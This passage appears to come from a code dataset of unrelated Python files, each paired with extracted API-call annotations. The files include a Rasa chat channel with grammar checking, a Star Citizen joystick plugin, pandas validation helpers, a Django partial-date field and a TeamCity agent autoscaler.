def __init__(self, sio, socketio_path, *args, **kwargs):
self.sio = sio
self.socketio_path = socketio_path
super(RasaAppBlueprint, self).__init__(*args, **kwargs)
def register(self, app, options):
self.sio.attach(app, self.socketio_path)
super(RasaAppBlueprint, self).register(app, options)
class RasaAppOutput(OutputChannel):
"""
Rasa socket output channel
"""
@classmethod
def name(cls):
return "rasa_app"
def __init__(self, sio, sid, bot_message_evt, language_errors):
self.sio = sio
self.sid = sid
# socket.io events
self.bot_message_evt = bot_message_evt
# list of found language errors
self.language_errors = language_errors
async def _send_message(self, socket_id: Text, response: Any) -> None:
"""Sends a message to the recipient using the bot event."""
await self.sio.emit(self.bot_message_evt, response, room=socket_id)
async def send_text_message(
self, recipient_id: Text, text: Text, **kwargs: Any
) -> None:
"""Send a message through this channel."""
await self._send_message(self.sid, {"text": text})
async def send_language_errors_message(
self, recipient_id: Text, text: Text, **kwargs: Any
) -> None:
"""Send a list of errors detected by LanguageTool."""
await self._send_message(self.sid, {"text": text})
async def send_image_url(
self, recipient_id: Text, image: Text, **kwargs: Any
) -> None:
"""Sends an image to the output"""
message = {"attachment": {"type": "image", "payload": {"src": image}}}
await self._send_message(self.sid, message)
async def send_text_with_buttons(
self,
recipient_id: Text,
text: Text,
buttons: List[Dict[Text, Any]],
**kwargs: Any
) -> None:
"""Sends buttons to the output."""
message = {"text": text, "quick_replies": []}
for button in buttons:
message["quick_replies"].append(
{
"content_type": "text",
"title": button["title"],
"payload": button["payload"],
}
)
await self._send_message(self.sid, message)
async def send_elements(
self, recipient_id: Text, elements: Iterable[Dict[Text, Any]], **kwargs: Any
) -> None:
"""Sends elements to the output."""
for element in elements:
message = {
"attachment": {
"type": "template",
"payload": {"template_type": "generic", "elements": element},
}
}
await self._send_message(self.sid, message)
async def send_custom_json(
self, recipient_id: Text, json_message: Dict[Text, Any], **kwargs: Any
) -> None:
"""Sends custom json to the output"""
json_message.setdefault("room", self.sid)
await self.sio.emit(self.bot_message_evt, **json_message)
class RasaAppInput(InputChannel):
"""
Rasa socket.io input channel
"""
@classmethod
def name(cls):
return "rasa_app"
@classmethod
def from_credentials(cls, credentials):
credentials = credentials or {}
return cls(
credentials.get("user_message_evt", "user_uttered"),
credentials.get("bot_message_evt", "bot_uttered"),
credentials.get("bot_found_errors_evt", "bot_error_message"),
credentials.get("namespace"),
credentials.get("session_persistence", False),
credentials.get("socketio_path", "/socket.io"),
credentials.get("languagetool_url", "localhost"),
credentials.get("languagetool_port", "8082"),
)
def __init__(
self,
user_message_evt: Text = "user_uttered",
bot_message_evt: Text = "bot_uttered",
bot_found_errors_evt: Text = 'bot_error_message',
namespace: Optional[Text] = None,
session_persistence: bool = False,
socketio_path: Optional[Text] = "/socket.io",
languagetool_url: Text = "localhost",
languagetool_port: int = 8082,
nlu_url: Text = "localhost",
nlu_port: int = 5045,
):
self.bot_message_evt = bot_message_evt
self.session_persistence = session_persistence
self.user_message_evt = user_message_evt
self.bot_found_errors_evt = bot_found_errors_evt
self.namespace = namespace
self.socketio_path = socketio_path
self.languagetool_api = LanguageTool(languagetool_url, languagetool_port)
self.nlu_api = NLUApi(nlu_url, nlu_port)
def blueprint(self, on_new_message):
sio = AsyncServer(async_mode="sanic")
socketio_webhook = RasaAppBlueprint(
sio, self.socketio_path, "socketio_webhook", __name__
)
@socketio_webhook.route("/", methods=["GET"])
async def health(request: Request):
return response.json({"status": "ok"})
@sio.on("connect", namespace=self.namespace)
async def connect(sid, environ):
logger.debug("User {} connected to socketIO endpoint.".format(sid))
@sio.on("disconnect", namespace=self.namespace)
async def disconnect(sid):
logger.debug("User {} disconnected from socketIO endpoint.".format(sid))
@sio.on("session_request", namespace=self.namespace)
async def session_request(sid, data):
if data is None:
data = {}
if "session_id" not in data or data["session_id"] is None:
data["session_id"] = uuid.uuid4().hex
await sio.emit("session_confirm", data["session_id"], room=sid)
logger.debug("User {} connected to socketIO endpoint.".format(sid))
@sio.on("start_conversation", namespace=self.namespace)
async def start_conversation(sid, data):
if self.session_persistence:
if not data.get("session_id"):
logger.warning(
"A message without a valid sender_id "
"was received. This message will be "
"ignored. Make sure to set a proper "
"session id using the "
"`session_request` socketIO event."
)
return
sender_id = data["session_id"]
else:
sender_id = sid
output_channel = RasaAppOutput(sio, sid, self.bot_message_evt, [])
message = UserMessage(
"Hello!", output_channel, sender_id, input_channel=self.name()
)
await on_new_message(message)
@sio.on(self.user_message_evt, namespace=self.namespace)
async def handle_message(sid, data):
if self.session_persistence:
if not data.get("session_id"):
logger.warning(
"A message without a valid sender_id "
"was received. This message will be "
"ignored. Make sure to set a proper "
"session id using the "
"`session_request` socketIO event."
)
return
sender_id = data["session_id"]
else:
sender_id = sid
language_errors = []
# lt_response = None
try:
user_message = data["message"]
# Extract entities from the message
response_nlu = self.nlu_api.parse(user_message)
logger.info("NLU Response " + str(response_nlu))
logging.debug("response: " + str(response_nlu))
response_entities = response_nlu["entities"]
logging.debug("Entities NLU: " + str(response_entities))
# Check if text contains error
languagetool_response = self.languagetool_api.check_message(user_message)
logger.info("LanguageTool Response. " + str(languagetool_response))
languagetool_response.ignore_entity_errors(response_entities, ["name"])
language_errors = languagetool_response.get_languagetool_errors()
logging.debug("Errors found by LanguageTool: " + str(language_errors))
except (TypeError, ValueError):
logger.debug("Error occurred using LanguageTool")
if len(language_errors) > 0:
# Send found errors to the client
logger.debug("Errors: " + str(language_errors))
output_channel = RasaAppOutput(sio, sid, self.bot_found_errors_evt, language_errors)
await output_channel.send_language_errors_message(sender_id, language_errors)
output_channel = RasaAppOutput(sio, sid, self.bot_message_evt, language_errors)
message = UserMessage(
data["message"], output_channel, sender_id, input_channel=self.name()
)
await on_new_message(message)
return socketio_webhook
|
[
"uuid.uuid4",
"apis.nlu_api.NLUApi",
"socketio.AsyncServer",
"sanic.response.json",
"apis.languagetool_api.LanguageTool",
"logging.getLogger"
] |
[((362, 389), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (379, 389), False, 'import logging\n'), ((5294, 5343), 'apis.languagetool_api.LanguageTool', 'LanguageTool', (['languagetool_url', 'languagetool_port'], {}), '(languagetool_url, languagetool_port)\n', (5306, 5343), False, 'from apis.languagetool_api import LanguageTool\n'), ((5367, 5392), 'apis.nlu_api.NLUApi', 'NLUApi', (['nlu_url', 'nlu_port'], {}), '(nlu_url, nlu_port)\n', (5373, 5392), False, 'from apis.nlu_api import NLUApi\n'), ((5449, 5480), 'socketio.AsyncServer', 'AsyncServer', ([], {'async_mode': '"""sanic"""'}), "(async_mode='sanic')\n", (5460, 5480), False, 'from socketio import AsyncServer\n'), ((5720, 5751), 'sanic.response.json', 'response.json', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (5733, 5751), False, 'from sanic import Blueprint, response\n'), ((6375, 6387), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6385, 6387), False, 'import uuid\n')]
|
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Joystick Gremlin Star Citizen
(Complete Star Citizen 3.7 Joystick Gremlin Plugin)
(https://robertsspaceindustries.com/citizens/Game_Overture)
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
import gremlin
import scmap
import threading
from gremlin.user_plugin import *
from gremlin.macro import *
mode = ModeVariable("Mode", "The mode to use for this mapping")
pvAimLeftRight = PhysicalInputVariable("Aim Thumbstick Left/Right",
"Aims left and right along an axis",
[gremlin.common.InputType.JoystickAxis])
pvAimUpDown = PhysicalInputVariable("Aim Thumbstick Up/Down",
"Aims up and down along an axis",
[gremlin.common.InputType.JoystickAxis])
pvResetAim = PhysicalInputVariable("Reset Aim",
"Reset gimble reticle button",
[gremlin.common.InputType.JoystickButton, gremlin.common.InputType.JoystickHat])
pvCycleAll = PhysicalInputVariable("Cycle All (back)",
"Cycle all targets. Hold to cycle backward",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvCycleNext = PhysicalInputVariable("Cycle Next Enemy (Friendly)",
"Cycle next enemy target. Hold to cycle next friendly",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvCyclePrev = PhysicalInputVariable("Cycle Previous Enemy (Friendly)",
"Cycle previous enemy target. Hold to cycle previous friendly",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvReticleFocus = PhysicalInputVariable("Reticle Focus (Pin Selected)",
"Target object under reticle. Hold to pin currently selected target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvTargetNearest = PhysicalInputVariable("Target Nearest Hostile (Cycle Pinned)",
"Target nearest hostile. Hold to cycle next pinned target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvSubTargetModifierKey = PhysicalInputVariable("Subtarget Modifer Key/Switch",
"When pressed/held, it cycles/resets subtarget instead of cycle/resets target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvDynamicZoomInOut = PhysicalInputVariable("Dynamic Zoom Axis",
"Zooms in and out cockpit view along an axis",
[gremlin.common.InputType.JoystickAxis])
pvScanningModeToggle = PhysicalInputVariable("Scanning Mode Toggle",
"Toggle scanning mode",
[gremlin.common.InputType.JoystickButton])
pvActivateScanning = PhysicalInputVariable("Activate Scanning",
"Activate scanning or something",
[gremlin.common.InputType.JoystickButton])
pvScanningIncreaseRadarAngle = PhysicalInputVariable("Increase Scanning Radar Angle",
"Increase Radar Angle for scans",
[gremlin.common.InputType.JoystickButton])
pvScanningDecreaseRadarAngle = PhysicalInputVariable("Decrease Scanning Radar Angle",
"Decrease Radar Angle for scans",
[gremlin.common.InputType.JoystickButton])
class JGSCTempo:
def __init__(self, scmap_short, scmap_long):
self.delay = 0.5
self.start_time = 0
self.timer = None
shortActionPress = VJoyAction(scmap_short[1], gremlin.common.InputType.JoystickButton, scmap_short[0], True)
shortActionRelease = VJoyAction(scmap_short[1], gremlin.common.InputType.JoystickButton, scmap_short[0], False)
self.vBtnPressMacroShort = Macro()
self.vBtnPressMacroShort.add_action(shortActionPress)
self.vBtnPressMacroShort.pause(0.1)
self.vBtnPressMacroShort.add_action(shortActionRelease)
longActionPress = VJoyAction(scmap_long[1], gremlin.common.InputType.JoystickButton, scmap_long[0], True)
longActionRelease = VJoyAction(scmap_long[1], gremlin.common.InputType.JoystickButton, scmap_long[0], False)
self.vBtnPressMacroLong = Macro()
self.vBtnPressMacroLong.add_action(longActionPress)
self.vBtnPressMacroLong.pause(0.1)
self.vBtnPressMacroLong.add_action(longActionRelease)
def process_event(self, event):
if event.is_pressed:
self.start_time = time.time()
self.timer = threading.Timer(self.delay, self._long_press)
self.timer.start()
else:
if (self.start_time + self.delay) > time.time():
# Short press
self.timer.cancel()
MacroManager().queue_macro(self.vBtnPressMacroShort)
def _long_press(self):
MacroManager().queue_macro(self.vBtnPressMacroLong)
self.timer.cancel()
self.timer = None
aimLeftRightDecorator = pvAimLeftRight.create_decorator(mode.value)
@aimLeftRightDecorator.axis(pvAimLeftRight.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_AimLeftRight[1]].axis(scmap.AXIS_AimLeftRight[0]).value = event.value
aimUpDownDecorator = pvAimUpDown.create_decorator(mode.value)
@aimUpDownDecorator.axis(pvAimUpDown.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_AimUpDown[1]].axis(scmap.AXIS_AimUpDown[0]).value = event.value
resetAimDecorator = pvResetAim.create_decorator(mode.value)
@resetAimDecorator.button(pvResetAim.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ResetAim[1]].button(scmap.ResetAim[0]).is_pressed = event.is_pressed
cycleAllTempo = JGSCTempo(scmap.CycleAllTargets, scmap.CycleAllTargetsBack)
cycleAllDecorator = pvCycleAll.create_decorator(mode.value)
@cycleAllDecorator.button(pvCycleAll.input_id)
def onBtn(event):
cycleAllTempo.process_event(event)
cycleNextTempo = JGSCTempo(scmap.CycleHostileTargets, scmap.CycleFriendlyTargets)
cycleNextDecorator = pvCycleNext.create_decorator(mode.value)
@cycleNextDecorator.button(pvCycleNext.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.CycleSubTarget[1]].button(scmap.CycleSubTarget[0]).is_pressed = event.is_pressed
else:
cycleNextTempo.process_event(event)
cyclePrevTempo = JGSCTempo(scmap.CycleHostileTargetsBack, scmap.CycleFriendlyTargetsBack)
cyclePrevDecorator = pvCyclePrev.create_decorator(mode.value)
@cyclePrevDecorator.button(pvCyclePrev.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.CycleSubTargetBack[1]].button(scmap.CycleSubTargetBack[0]).is_pressed = event.is_pressed
else:
cyclePrevTempo.process_event(event)
reticleFocusTempo = JGSCTempo(scmap.ReticleFocus, scmap.PinFocusedTarget)
reticleFocusDecorator = pvReticleFocus.create_decorator(mode.value)
@reticleFocusDecorator.button(pvReticleFocus.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.ResetSubTarget[1]].button(scmap.ResetSubTarget[0]).is_pressed = event.is_pressed
else:
reticleFocusTempo.process_event(event)
targetNearestTempo = JGSCTempo(scmap.TargetNearestHostile, scmap.CyclePinnedTargets)
targetNearestDecorator = pvTargetNearest.create_decorator(mode.value)
@targetNearestDecorator.button(pvTargetNearest.input_id)
def onBtn(event):
targetNearestTempo.process_event(event)
subTargetModifierKeyDecorator = pvSubTargetModifierKey.create_decorator(mode.value)
@subTargetModifierKeyDecorator.button(pvSubTargetModifierKey.input_id)
def onBtn(event, vjoy):
if not event.is_pressed:
vjoy[scmap.CycleSubTarget[1]].button(scmap.CycleSubTarget[0]).is_pressed = False
vjoy[scmap.CycleSubTargetBack[1]].button(scmap.CycleSubTargetBack[0]).is_pressed = False
vjoy[scmap.ResetSubTarget[1]].button(scmap.ResetSubTarget[0]).is_pressed = False
dynamicZoomInOutDecorator = pvDynamicZoomInOut.create_decorator(mode.value)
@dynamicZoomInOutDecorator.axis(pvDynamicZoomInOut.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_DynamicZoomInAndOut[1]].axis(scmap.AXIS_DynamicZoomInAndOut[0]).value = event.value
scanningModeToggleDecorator = pvScanningModeToggle.create_decorator(mode.value)
@scanningModeToggleDecorator.button(pvScanningModeToggle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningModeToggle[1]].button(scmap.ScanningModeToggle[0]).is_pressed = event.is_pressed
activateScanningDecorator = pvActivateScanning.create_decorator(mode.value)
@activateScanningDecorator.button(pvActivateScanning.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ActivateScanning[1]].button(scmap.ActivateScanning[0]).is_pressed = event.is_pressed
scanningIncreaseRadarAngleDecorator = pvScanningIncreaseRadarAngle.create_decorator(mode.value)
@scanningIncreaseRadarAngleDecorator.button(pvScanningIncreaseRadarAngle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningIncreaseRadarAngle[1]].button(scmap.ScanningIncreaseRadarAngle[0]).is_pressed = event.is_pressed
scanningDecreaseRadarAngleDecorator = pvScanningDecreaseRadarAngle.create_decorator(mode.value)
@scanningDecreaseRadarAngleDecorator.button(pvScanningDecreaseRadarAngle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningDecreaseRadarAngle[1]].button(scmap.ScanningDecreaseRadarAngle[0]).is_pressed = event.is_pressed
|
[
"threading.Timer"
] |
[((4877, 4922), 'threading.Timer', 'threading.Timer', (['self.delay', 'self._long_press'], {}), '(self.delay, self._long_press)\n', (4892, 4922), False, 'import threading\n')]
|
import _sk_fail; _sk_fail._("dis")
|
[
"_sk_fail._"
] |
[((17, 34), '_sk_fail._', '_sk_fail._', (['"""dis"""'], {}), "('dis')\n", (27, 34), False, 'import _sk_fail\n')]
|
import sys
sys.path.append( "../psml" )
from typeguard.importhook import install_import_hook
install_import_hook('psml')
from psml import *
right10 = modifier( lambda s: s + vector( 0, 0, 10 ) ** s )
m = \
right10 ** sphere( 6 )
m.write()
|
[
"sys.path.append",
"typeguard.importhook.install_import_hook"
] |
[((11, 37), 'sys.path.append', 'sys.path.append', (['"""../psml"""'], {}), "('../psml')\n", (26, 37), False, 'import sys\n'), ((94, 121), 'typeguard.importhook.install_import_hook', 'install_import_hook', (['"""psml"""'], {}), "('psml')\n", (113, 121), False, 'from typeguard.importhook import install_import_hook\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Utilities to summarize, validate and display DataFrames."""
# pylint: disable=invalid-name,dangerous-default-value
# pylint: disable=logging-fstring-interpolation
import pandas as pd
import pandera as pa
from IPython.display import display
from prefect import get_run_logger
def summarize_df(df: pd.DataFrame) -> None:
"""Show properties of a DataFrame."""
display(
df.dtypes.rename("dtype")
.to_frame()
.merge(
df.isna().sum().rename("num_missing").to_frame(),
left_index=True,
right_index=True,
how="left",
)
.assign(num=len(df))
.merge(
df.nunique().rename("nunique").to_frame(),
left_index=True,
right_index=True,
how="left",
)
.merge(
df.dropna(how="any")
.sample(1)
.squeeze()
.rename("single_non_nan_value")
.to_frame(),
left_index=True,
right_index=True,
how="left",
)
)
def log_prefect(
msg: str, start: bool = True, use_prefect: bool = False
) -> None:
"""Logging with Prefect."""
if use_prefect:
if start:
logger = get_run_logger()
logger.info(msg)
else:
print(msg)
def pandera_validate_data(
df: pd.DataFrame,
schema: pa.DataFrameSchema,
ds_name: str,
use_prefect: bool = False,
) -> None:
"""Manually validate a DataFrame using a pandera DataFrameSchema."""
log_prefect(f"Validating {ds_name}...", True, use_prefect)
schema_cols = list(schema.columns)
try:
schema(df[schema_cols])
if not use_prefect:
print(f"Validated {ds_name} data")
except pa.errors.SchemaError as e:
print(f"Could not validate {ds_name} data\n{str(e)}")
log_prefect(f"Done validating {ds_name}.", False, use_prefect)
def save_data_to_parquet_file(
df: pd.DataFrame, filepath: str = "data/raw/myfile.parquet.gzip"
) -> None:
"""Export DataFrame to a parquet file."""
df.to_parquet(filepath, index=False, engine="auto")
|
[
"prefect.get_run_logger"
] |
[((1293, 1309), 'prefect.get_run_logger', 'get_run_logger', ([], {}), '()\n', (1307, 1309), False, 'from prefect import get_run_logger\n')]
|
import datetime
from django.db import models
from functools import reduce
'''
-goal: a custom Django field that accepts input with different levels of date specificity, ranging from a specific day to a millennium
creating a custom field keeps data entry and database structure simple compared to using multiple fields
-Solution
Create a date mapper class (a custom django field is based on a python class)
This class maps a string input to a datetime instance. Following the partial-date repository we can use the seconds to store the specificity of the date.
'''
format_help = '''
The input string has the following format:
(format)
day 1999-12-04 Y-M-D
month 1999-12 Y-M
year 1999y <integer>y
decade 200d <integer>d 1990-2000
century 20c <integer>c 1900-2000
millenium 2m <integer>m 1000-2000
For december fourth 1999 you type: 1999-12-04
Alternative formats
(format) (Alternative format)
2c 2nd century
4m 4th millenium
1999y 1999
1999-01 January 1999
1999-01-31 January 31, 1999
'''
class PartialDate:
'''A class to map between a string and datetime object for a custom django field that can store partial dates.'''
def __init__(self,s = None, t = None):
'''Object that map between string and datetime object.
s specially formated string (see format_help) that specifies a date
t datetime object with precission stored in the microseconds
'''
self.s = s
self.format_help = format_help
self.format_error = ValueError('input string does not conform to format "'
+ str(self.s) + '"\n' + self.format_help)
self.type_dict = {'y':'year','d':'decade','c':'century','m':'millenium',
'ym':'year_month','ymd':'year_month_day'}
self.type2number_dict = {'year':0,'decade':1,'century':2,'millenium':3,
'year_month':4,'year_month_day':5}
self.number2type_dict = reverse_dict(self.type2number_dict)
self.type2multiplier = {'decade':10,'century':100,'millenium':1000}
self.month_dict = dict([[datetime.datetime(2020, i,1).strftime('%B'),i] for i in range(1,13)])
if s == None and t == None: raise ValueError('please provide string or datetime object')
if s:
self.determine_type()
self._set_datetime()
else: self.set_datetime_form_database(t)
def __str__(self):
return self.pretty_string()
def __repr__(self):
return str(self.start_dt) + ' ' + str(self.end_dt)
def __lt__(self,other):
if type(other) == float: return self.dt < datetime.datetime.fromtimestamp(other)
elif type(other) == datetime.datetime: return self.dt < other
elif not type(self) == type(other):
raise ValueError('cannot compare with ' + str(type(other)) + ' ' + other)
return self.dt < other.dt
def __contains__(self,other):
'''checks whether the other time is within the self time.'''
if type(other) == float:
start_dt = datetime.datetime.fromtimestamp(other)
end_dt = start_dt
elif type(self) == type(other): start_dt, end_dt = other.start_dt,other.end_dt
elif type(other) == datetime.datetime: start_dt, end_dt = dt, dt
else: raise ValueError('cannot compare with ' + str(type(other)) + ' ' + other)
return self.start_dt <= start_dt and self.end_dt >= end_dt
def __eq__(self,other):
if type(self) == type(other):
return self.dt == other.dt
return False
def determine_type(self):
'''based on the string format the level of date specificity is determined.'''
self.year, self.month, self.day = 1,1,1
if self.s == '': raise self.format_error
elif check_month(self.s):
self.month = self.month_dict[check_month(self.s)]
self.year = int(self.s.split(' ')[-1])
if self.s.count(' ') == 2:
self.day = int(self.s.split(' ')[1].strip(','))
self.type = 'year_month_day'
else: self.type = 'year_month'
elif check_year(self.s):
self.type = 'year'
self.number = check_year(self.s)
self.year = self.number
elif check_decade_century_milenium(self.s):
self.type = check_decade_century_milenium(self.s)
self.number = extract_number_from_count_string(self.s)
elif self.s[-1] in self.type_dict.keys():
try: setattr(self,self.type_dict[self.s[-1]],int(self.s[:-1]))
except: raise self.format_error
else:
self.type = self.type_dict[self.s[-1]]
self.number = int(self.s[:-1])
elif self.s.count('-') == 1:
try: self.year, self.month = [int(s) for s in self.s.split('-')]
except: raise self.format_error
else:self.type = 'year_month'
elif self.s.count('-') == 2:
try: self.year, self.month,self.day = [int(s) for s in self.s.split('-')]
except: raise self.format_error
else:self.type = 'year_month_day'
else: raise self.format_error
def _set_datetime(self):
'''create the datetime object. dt, start_dt end_dt (dt == start_dt)
start / end dt refer to the start /end point of a date,
for example 2nd century (2c) start_date = 100-01-01, end_date = 0199-12-31
the start date is stored in the database
'''
if self.type in 'decade,century,millenium'.split(','):
self.end_year = self.number * self.type2multiplier[self.type] - 1
self.year = self.end_year + 1 - self.type2multiplier[self.type]
if self.year == 0: self.year =1
self.dt = datetime.datetime(year=self.year,month=1,day=1,microsecond = self.type2number_dict[self.type])
self.start_dt = self.dt
self.end_dt = datetime.datetime(year=self.end_year,month=12,day=31,microsecond = self.type2number_dict[self.type])
else:
self.dt = datetime.datetime(year=self.year,month=self.month,day=self.day,microsecond = self.type2number_dict[self.type])
self.start_dt = self.dt
if self.type == 'year': self.month, self.day =12,31
if self.type == 'year_month': self.day = month2endday(self.year,self.month)
self.end_dt = datetime.datetime(year=self.year,month=self.month,day=self.day,
microsecond=self.type2number_dict[self.type])
def set_datetime_form_database(self, dt):
'''Create a partial date object from a datetime object (microseconds indicate the precission).'''
self.dt = dt
self.start_dt = self.dt
self._datetime2str()
self._set_datetime()
def _datetime2str(self):
'''Create the string representation based on datetime object.'''
self.type = self.number2type_dict[self.dt.microsecond]
self.year = self.dt.year
self.month = self.dt.month
self.day = self.dt.day
if self.type in 'decade,century,millenium'.split(','):
n = self.type2multiplier[self.type]
self.number = int((self.year+n)/n)
self.s = str(self.number) + reverse_dict(self.type_dict)[self.type]
elif self.type == 'year': self.s = self.dt.strftime('%Y')
elif self.type == 'year_month': self.s = self.dt.strftime('%Y-%m')
elif self.type == 'year_month_day': self.s = self.dt.strftime('%Y-%m-%d')
else: raise ValueError('do not recognize type:',self.type)
def pretty_string(self):
'''Create nice format for the date (e.g. 2nd century).'''
if self.type in 'decade,century,millenium'.split(','):
return make_count_string(self.number) + ' ' + self.type
if self.type == 'year': s='%Y'
if self.type == 'year_month': s='%B %Y'
if self.type == 'year_month_day': s='%B %d, %Y'
return self.dt.strftime(s)
@property
def name(self):
return self.s
@property
def help(self):
print(self.format_help)
class PartialDateField(models.Field):
'''Custom django field to store date information with different levels of specificity.'''
def get_internal_type(self):
return "DateTimeField"
def from_db_value(self, value, expression, connection, context = None):
if value is None: return value
if isinstance(value, PartialDate): return value
return PartialDate(t = value)
def to_python(self, value):
if value is None: return value
if isinstance(value, PartialDate): return value
if isinstance(value, str): return PartialDate(value)
raise expressions.ValidationError('could not parse: '+value)
def get_prep_value(self,value):
if value is None or value == '': return None
partial_date = self.to_python(value)
return partial_date.dt
def make_count_string(n):
'''Create the correct abbreviation for a date (2nd or 4th) for 2nd or 4th century).'''
if n == 0 or int(str(n)[-1]) > 3 or int(str(n)[-1]) == 0: return str(n)+'th'
if str(n)[-1] == '1': return str(n)+'st'
if str(n)[-1] == '2': return str(n)+'nd'
if str(n)[-1] == '3': return str(n)+'rd'
raise ValueError('could not parse',n)
def extract_number_from_count_string(s):
for abbrev in 'th,st,nd,rd'.split(','):
if abbrev in s: return int(s.split(abbrev)[0])
raise ValueError('could not extract number from ' +s)
def check_month(s):
months = [datetime.datetime(2020, i,1).strftime('%B') for i in range(1,13)]
for month in months:
if month.lower() in s.lower(): return month
return False
def check_year(s):
try: return int(s)
except: return False
def check_decade_century_milenium(s):
for n in 'decade,century,millenium'.split(','):
if n in s: return n
return False
def month2endday(year, month):
# deal with leap years for february
if month == 2:
if year % 4 == 0:
if year % 100 == 0:
if year % 400 == 0: return 29
return 28
return 29
return 28
# deal with the short months
if month in [4,6,9,11]: return 30
# the rest
return 31
def reverse_dict(d):
'''Swap keys and values does not check whether original values are unique.'''
return {v:k for k, v in d.items()}
|
[
"datetime.datetime",
"datetime.datetime.fromtimestamp"
] |
[((2888, 2926), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['other'], {}), '(other)\n', (2919, 2926), False, 'import datetime\n'), ((5216, 5316), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': '(1)', 'day': '(1)', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=1, day=1, microsecond=self.\n type2number_dict[self.type])\n', (5233, 5316), False, 'import datetime\n'), ((5355, 5461), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.end_year', 'month': '(12)', 'day': '(31)', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.end_year, month=12, day=31, microsecond=self.\n type2number_dict[self.type])\n', (5372, 5461), False, 'import datetime\n'), ((5477, 5592), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': 'self.month', 'day': 'self.day', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=self.month, day=self.day,\n microsecond=self.type2number_dict[self.type])\n', (5494, 5592), False, 'import datetime\n'), ((5766, 5881), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'self.year', 'month': 'self.month', 'day': 'self.day', 'microsecond': 'self.type2number_dict[self.type]'}), '(year=self.year, month=self.month, day=self.day,\n microsecond=self.type2number_dict[self.type])\n', (5783, 5881), False, 'import datetime\n'), ((2505, 2543), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['other'], {}), '(other)\n', (2536, 2543), False, 'import datetime\n'), ((8610, 8639), 'datetime.datetime', 'datetime.datetime', (['(2020)', 'i', '(1)'], {}), '(2020, i, 1)\n', (8627, 8639), False, 'import datetime\n'), ((2048, 2077), 'datetime.datetime', 'datetime.datetime', (['(2020)', 'i', '(1)'], {}), '(2020, i, 1)\n', (2065, 2077), False, 'import datetime\n')]
|
import os
import time
import logging
import argparse
from datetime import datetime, timedelta, timezone
import requests
log = logging.getLogger(__name__)
dead_disconnected_timeout = timedelta(minutes=5)
# TODO: add schedule
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--base-url', required=True)
arg_parser.add_argument('--auth-token', required=True)
arg_parser.add_argument('--cloud-profile-id', required=True)
arg_parser.add_argument('--min-idle-agents', type=int, default=1)
arg_parser.add_argument('--watch-interval-sec', type=int, default=60)
arg_parser.add_argument('--log-level', default='INFO')
args = arg_parser.parse_args()
logging.basicConfig(format='%(message)s', level=args.log_level.upper())
log.info('Base URL: %s', args.base_url)
if args.auth_token.startswith('$'):
args.auth_token = os.environ[args.auth_token[1:]]
s = requests.Session()
s.headers['Accept'] = 'application/json'
s.headers['Authorization'] = f'Bearer {args.auth_token}'
# Test connection
resp = s.get(f'{args.base_url}app/rest/server')
resp.raise_for_status()
while True:
request_fields = 'id,name,connected,enabled,idleSinceTime,lastActivityTime'
resp = s.get(f'{args.base_url}app/rest/agents?fields=agent({request_fields})')
resp.raise_for_status()
agents = resp.json()
idle_agents = [a for a in agents['agent'] if a['enabled'] and a.get('idleSinceTime')]
alive_idle_agents = [a for a in idle_agents if is_alive(a)]
resp = s.get(f'{args.base_url}app/rest/cloud/instances')
resp.raise_for_status()
cloud_instances = resp.json()
scheduled_agents_count = sum(1 for i in cloud_instances['cloudInstance'] if i['state'] == 'scheduled_to_start')
log.info('Agents: %d idle (%d alive), %d pending. Target: %d',
len(idle_agents),
len(alive_idle_agents),
scheduled_agents_count,
args.min_idle_agents)
agents_to_start = args.min_idle_agents - len(alive_idle_agents) - scheduled_agents_count
if agents_to_start > 0:
log.info('Starting %d agents', agents_to_start)
for _ in range(agents_to_start):
s.cookies.clear() # clear session cookies to fix CSRF error
log.debug('Starting cloud instance with profile ID "%s"', args.cloud_profile_id)
resp = s.post(f'{args.base_url}app/rest/cloud/instances', json={
'image': {
'id': f'profileId:{args.cloud_profile_id}',
},
})
resp.raise_for_status()
log.debug('Sleeping %d seconds', args.watch_interval_sec)
time.sleep(args.watch_interval_sec)
def is_alive(agent):
if agent['connected']:
return True
last_activity_time = datetime.strptime(agent['lastActivityTime'], '%Y%m%dT%H%M%S%z')
now = datetime.now(timezone.utc)
